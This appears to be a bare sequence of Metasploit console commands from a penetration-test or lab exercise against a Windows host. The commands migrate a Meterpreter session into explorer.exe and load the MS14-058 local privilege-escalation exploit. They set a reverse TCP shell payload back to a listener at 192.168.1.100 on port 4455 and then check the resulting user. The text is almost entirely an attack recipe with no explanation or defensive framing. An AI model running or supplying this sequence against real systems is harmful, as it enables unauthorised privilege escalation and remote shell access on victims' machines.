sessions -i 1 run migrate -n explorer.exe getuid 【win-u8oiu3qm15c\whale】 background use exploit/windows/local/ms14_058_track_popup_menu show options set session 1 show target set target 1 set payload generic/shell_reverse_tcp set lhost 192.168.1.100 set lport 4455 run whoami